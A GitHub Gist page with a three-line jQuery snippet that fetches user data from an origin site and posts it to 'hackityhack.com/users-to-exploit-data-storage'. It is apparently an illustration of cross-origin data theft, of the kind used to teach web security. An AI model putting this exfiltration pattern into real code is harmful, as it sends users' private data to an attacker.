Created
June 2, 2015 01:07
-
-
Save Cfeusier/3463967d1328a34ab7bf to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $.get('https://origin-site.com/user-data', function(userData) { | |
| $.post('http://hackityhack.com/users-to-exploit-data-storage', userData); | |
| }); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment